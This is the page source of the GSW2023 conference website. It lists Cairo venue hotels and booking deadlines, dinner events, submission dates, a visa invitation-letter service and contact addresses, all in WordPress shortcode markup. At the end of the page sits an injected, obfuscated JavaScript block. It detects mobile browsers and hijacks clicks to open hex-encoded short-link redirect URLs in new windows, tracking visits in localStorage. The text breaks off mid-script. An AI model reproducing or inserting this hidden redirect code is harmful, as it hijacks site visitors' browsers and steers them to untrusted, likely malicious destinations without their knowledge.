image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 